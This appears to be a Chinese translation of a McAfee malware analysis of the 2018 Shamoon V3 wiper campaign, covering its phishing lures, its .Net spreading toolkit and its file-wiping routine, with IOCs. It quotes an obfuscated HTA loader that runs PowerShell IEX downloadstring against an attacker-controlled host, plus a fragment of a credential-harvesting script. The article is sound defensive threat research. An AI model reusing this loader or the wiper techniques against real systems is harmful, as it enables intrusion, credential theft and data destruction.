在上周,McAfee高级威胁研究小组发布了一篇分析文章。在这篇文章中,该研究小组分析了针对中东和欧洲企业的新一波Shamoon“wiper(磁盘擦除恶意软件)”攻击活动,并讨论了最新Shamoon攻击活动与此前Shamoon攻击活动的区别。其中最值得关注的是,最新版本的Shamoon(Shamoon V3)作为一个wiper模块,也作为一种独立的恶意软件被使用。
基于对Shamoon V3的分析以及其他一些线索,,该研究小组得出了这样一个结论,这些攻击背后的幕后黑手很可能是伊朗黑客组织APT33,或一个试图伪装成APT33的黑客组织。
在2016到2017年期间的Shamoon攻击活动中,攻击者同时使用了Shamoon V2和另一种wiper――Stonedrill。而在2018年的攻击活动中,该研究小组观察到了Shamoon V3和另一款最初由赛门铁克提到的wiper――Filerase。
该研究小组的分析表明,最新版本的Shamoon似乎只是一个包含多个模块的.Net工具包的一部分。具体来说,该研究小组确认了以下模块:
OCLC.exe:用于读取攻击者创建的目标计算机列表,并负责运行第二个工具spreader.exe。 Spreader.exe:用于向目标计算机传播wiper。另外,它也被用于获取有关操作系统版本的信息。 SpreaderPsexec.exe:与spreader.exe类似,但它使用的是psexec.exe来远程执行wiper。 SlHost.exe:wiper模块,遍历系统并擦除每一个目标文件。这也反映出,至少有多名开发人员参与了为最新一波攻击准备恶意软件的工作。该研究小组曾在上一篇文章中指出,Shamoon V3作为.Net工具包中的一个wiper模块,它也可作为一种独立的恶意软件供其他攻击组织使用。从最近的这些攻击来看,这种假设似乎得到了证实。该研究小组还了解到,攻击者在数个月前就已经启动了新活动的前期准备工作,目标旨在通过wiper的执行来破坏目标系统。
这篇文章提供了有关新一波Shamoon攻击的更多见解,以及对.Net工具包的详细分析。
地缘政治背景与此前一样,攻击的动机尚不明确。因为,Shamoon V1攻击的是位于中东的两个目标,Shamoon V2攻击的是位于沙特阿拉伯的多个目标,而Shamoon V3利用欧洲的供应商对中东企业发起了供应链攻击。
在这个.Net工具包中,该研究小组发现了如下ASCII图案:
这些字符组成了一个类似于阿拉伯文“ ”的图案。这是古兰经(Surah Masad, Ayat 1 [111:1])中的一句话,意思是“愿火焰之父的双手毁灭吧!他已经毁灭。” 攻击流程
恶意软件是如何进入受害者的网络的?
该研究小组的分析表明,攻击者在前期准备阶段创建了一些与某些合法域名(提供就业机会的网站)非常相似的网站。例如:
Hxxp://possibletarget.ddns.com:880/JobOffering
由该研究小组发现的许多URL都与主要在中东运营的能源企业有关,其中一些网站还包含有执行其他payload的恶意HTML应用程序文件,其余网站则旨在诱使受害者使用自己的凭证进行登录。根据McAfee的遥测数据,这些攻击似乎是从2018年8月底开始的,而目的就是收集这些凭证。
以下是一个恶意HTML应用程序文件的代码示例:
YjDrMeQhBOsJZ = “WS” wcpRKUHoZNcZpzPzhnJw = “crip” RulsTzxTrzYD = “t.Sh” MPETWYrrRvxsCx = “ell” PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx) OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ) ULRXZmHsCORQNoLHPxW = “cm” zhKokjoiBdFhTLiGUQD = “d.e” KoORGlpnUicmMHtWdpkRwmXeQN = “xe” KoORGlpnUicmMHtWdp = “.” KoORGlicmMHtWdp = “(‘http://mynetwork.ddns.net:880/*****.ps1’) OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp) OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc上面这个脚本被用于在受害者的计算机上打开一个命令shell,并从外部下载一个PowerShell脚本。对PowerShell脚本的分析表明,它被用于收集用户名、密码和域名等信息。以下是PowerShell脚本的部分代码:
function primer { if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username} $o=”$env:userdomain\$u $env:computername $env:PROCESSOR_ARCHITECTURE通过收集到的凭证,攻击者能够登录到目标网络中,并传播wiper。
.Net工具包如上所述,新一波Shamoon攻击是通过一个.Net工具包进行的,旨在传播ShamoonV3和Filerase。
第一个模块(OCLC.exe)被用于读取存储在两个本地目录(“shutter”和“light”)中的两个文本文件,它们包含有目标计算机列表。
另外,OCLC.exe也被用于启动一个新的隐藏命令窗口进程来运行第二个模块Spreader.exe,该模块被用于使用上述两个文本文件作为参数,以传播ShamoonV3和Filerase。
首先,Spreader.exe模块会使用上述包含目标计算机列表和windows版本的两个文本文件作为参数,以检查目标计算机的Windows版本。
然后,将可执行文件(Shamoon和Filerase)放入文件夹“Net2”中。
另外,它还会在远程计算机上创建一个文件夹:C:\\Windows\System32\Program Files\Internet Explorer\Signing。
然后,将上述可执行文件复制到该文件夹中。
接下来,它会创建一个批处理文件“\\RemoteMachine\admin$\\process.bat”来运行远程计算机上的可执行文件。需要注意的是,这个批处理文件包含了可执行文件的路径。然后,它会设置运行批处理文件的权限。
如果上述过程失败,Spreader.exe模块还会创建一个名为“NotFound.txt”的文本文件,其中包含目标计算机名称和操作系统版本。攻击者可以通过它来追踪传播过程中出现的问题。
以下展示的是上述过程所涉及到的一些函数:
如果在文件夹“Net2”中不存在可执行文件,Spreader.exe模块则会检查文件夹“all”和“Net4”。
为了传播wiper,攻击者还使用了另一个模块SpreaderPsexec.exe。需要说明的是,Psexec.exe是微软PSTools工具中的一种用于远程执行命令的管理工具。
这里的区别在于,SpreaderPsexec.exe使用的Psexec.exe存储在文件夹“Net2”中。这意味着它也可以在其他计算机上使用,以进一步传播wiper。
wiper包含三个选项:
SilentMode:在没有任何输出的情况下运行wiper。 BypassAcl:提升权限。值得注意的是,它始终是开启的。 PrintStackTrace:追踪已擦除的文件夹和文件的数量。
如上所述,BypassAcl始终是开启的(始终为“true” )。它为wiper提供了以下权限:
SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeSecurityPrivilege
为了找到目标文件,wiper使用了GetFullPath函数来获取路径。
它会擦除找到的每一个目标文件夹和文件。
正如文章一开头所说的那样,它能够遍历系统每一个文件夹中的每一个文件。
对于要擦除的文件和文件夹,wiper首先会移除它们的“只读”属性。
接下来,它会将每个文件的创建、修改及访问时间都更改为3000年1月1日 12:01:01。
然后,它会使用随机字符串对每个文件进行两次重写。
它首先会使用带有ACCESS_MASK DELETE flag的API CreateFile擦除文件。
然后,使用FILE_DISPOSITION_INFORMATION擦除文件。
ProcessTracker函数则被用来追踪擦除的情况。
总结
McAfee高级威胁研究小组表示,在2017年的Shamoon攻击浪潮中,他们观察到了两种wiper。在2018年12月的攻击中,他们观察到了类似的特征。采用“工具包”的形式,攻击者可以通过受害者的网络来传播wiper模块。工具包是采用.Net编写的,且没有经过混淆处理。这与作为wiper模块的Shamoon V3不同,它的代码是经过加密处理的,作为一种逃避安全检测的手段。
很难确定这些攻击的动机,因为McAfee高级威胁研究小组还没有找到足够的线索。但他们表示,确实在Shamoon V3中看到了出现在Shamoon V2中的技术。另外,政治声明似乎已经成为Shamoon攻击的一部分。在V1中,攻击者使用了一张正在燃烧的美国国旗的图片。在V2中,攻击者使用了一张溺亡的叙利亚男孩的图片(附带有也门阿拉伯语的文字),似乎暗指叙利亚和也门的冲突。现在,我们在V3中看到了一段摘自《古兰经》的句子,可能预示着攻击的动机与另一场中东冲突有关。
通过对比在这些攻击中使用的TTP(战术、技术和流程),以及域名和工具(如FireEye在其报告中所描述的),McAfee高级威胁研究小组得出结论,这些攻击背后的幕后黑手很可能是伊朗黑客组织APT33,或一个试图伪装成APT33的黑客组织。
IOC散列值:
OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a文件路径和文件名:
C:\net2\ C:\all\ C:\net4\ C:\windows\system32\ C:\\Windows\System32\Program Files\Internet Explorer\Signing \\admin$\process.bat NothingFound.txt MaintenaceSrv32.exe MaintenaceSrv64.exe SlHost.exe OCLC.exe Spreader.exe SpreaderPsexec.exe 命令行
